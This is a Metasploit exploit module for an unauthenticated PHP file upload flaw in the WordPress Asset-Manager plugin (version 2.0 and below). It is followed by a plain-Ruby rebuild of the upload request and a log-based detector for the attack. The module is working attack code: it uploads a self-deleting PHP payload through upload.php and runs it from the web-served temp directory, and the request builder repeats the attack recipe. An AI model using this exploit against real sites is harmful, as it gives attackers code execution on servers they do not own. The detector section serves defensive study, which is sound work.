This module, taken from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin's upload.php accepts PHP files: a user can upload a file into a temp directory without any authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random 5-letter name so repeated runs do not collide in the temp directory
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stager that writes/executes the selected payload and deletes itself afterwards
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php expects a multipart form with a single file field named "Filedata"
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored filename back in the response body
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands, with its original name and extension, in a web-served temp directory
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
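A worked example added here, not part of the Metasploit module or the Asset-Manager plugin: it rebuilds the multipart request the module sends in plain Ruby (no Rex), so the field name, boundary and target path are visible without the framework, and it scans Apache-style access log lines for the trace the module leaves, a POST to upload.php followed by a GET of a .php file from the temp directory by the same client. The function names, the log lines and the IP addresses are constructed for this example.

```ruby
require 'securerandom'

UPLOAD_PATH = 'wp-content/plugins/asset-manager/upload.php'
TEMP_DIR    = 'wp-content/uploads/assets/temp/'

# Build the same kind of multipart/form-data POST the module sends:
# one file part named "Filedata" carrying an attacker-chosen filename.
# Returns a hash describing the request rather than sending it.
def build_upload(base_uri, filename, content, boundary = "----#{SecureRandom.hex(8)}")
  uri  = base_uri.end_with?('/') ? base_uri : base_uri + '/'
  body = +"--#{boundary}\r\n"
  body << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{filename}\"\r\n"
  body << "Content-Type: application/octet-stream\r\n\r\n"
  body << content << "\r\n--#{boundary}--\r\n"
  {
    method:  'POST',
    uri:     uri + UPLOAD_PATH,
    headers: { 'Content-Type'   => "multipart/form-data; boundary=#{boundary}",
               'Content-Length' => body.bytesize.to_s },
    body:    body
  }
end

# Minimal parser for Apache combined-format log lines (only the fields we need).
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Flag clients that POST to upload.php (200) and afterwards fetch a PHP file
# from the temp directory. A single upload without the follow-up GET is not
# reported, which keeps legitimate asset uploads out of the alert list.
def detect_upload_exec(lines)
  uploaders = {}   # ip => timestamp of last successful upload
  hits = []
  lines.each do |line|
    e = parse_line(line) or next
    if e[:method] == 'POST' && e[:path].include?(UPLOAD_PATH) && e[:status] == 200
      uploaders[e[:ip]] = e[:ts]
    elsif e[:method] == 'GET' && e[:path].include?(TEMP_DIR) &&
          e[:path] =~ /\.ph(p\d?|tml)(\?|$)/i && uploaders.key?(e[:ip])
      hits << { ip: e[:ip], upload_at: uploaders[e[:ip]], exec_path: e[:path], exec_at: e[:ts] }
    end
  end
  hits
end

# Constructed sample log: one exploit sequence and one benign visitor.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [26/May/2012:10:01:02 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
  203.0.113.7 - - [26/May/2012:10:01:03 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxw.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  198.51.100.9 - - [26/May/2012:10:02:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/brochure.pdf HTTP/1.1" 200 81234 "-" "Mozilla/5.0"
  198.51.100.9 - - [26/May/2012:10:02:11 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  req = build_upload('/wordpress', 'probe.php', '<?php echo "x"; ?>')
  puts "#{req[:method]} #{req[:uri]}"
  detect_upload_exec(SAMPLE_LOG.lines).each do |h|
    puts "ALERT #{h[:ip]} uploaded at #{h[:upload_at]}, executed #{h[:exec_path]} at #{h[:exec_at]}"
  end
end
```

The detector keys on the same two request paths the module hardcodes, so it will miss an attacker who renames the plugin directory or uploads with a non-PHP extension that the server still executes; treat it as a starting point for a rule, and pair it with a filesystem check of wp-content/uploads/assets/temp/ for any file ending in .php.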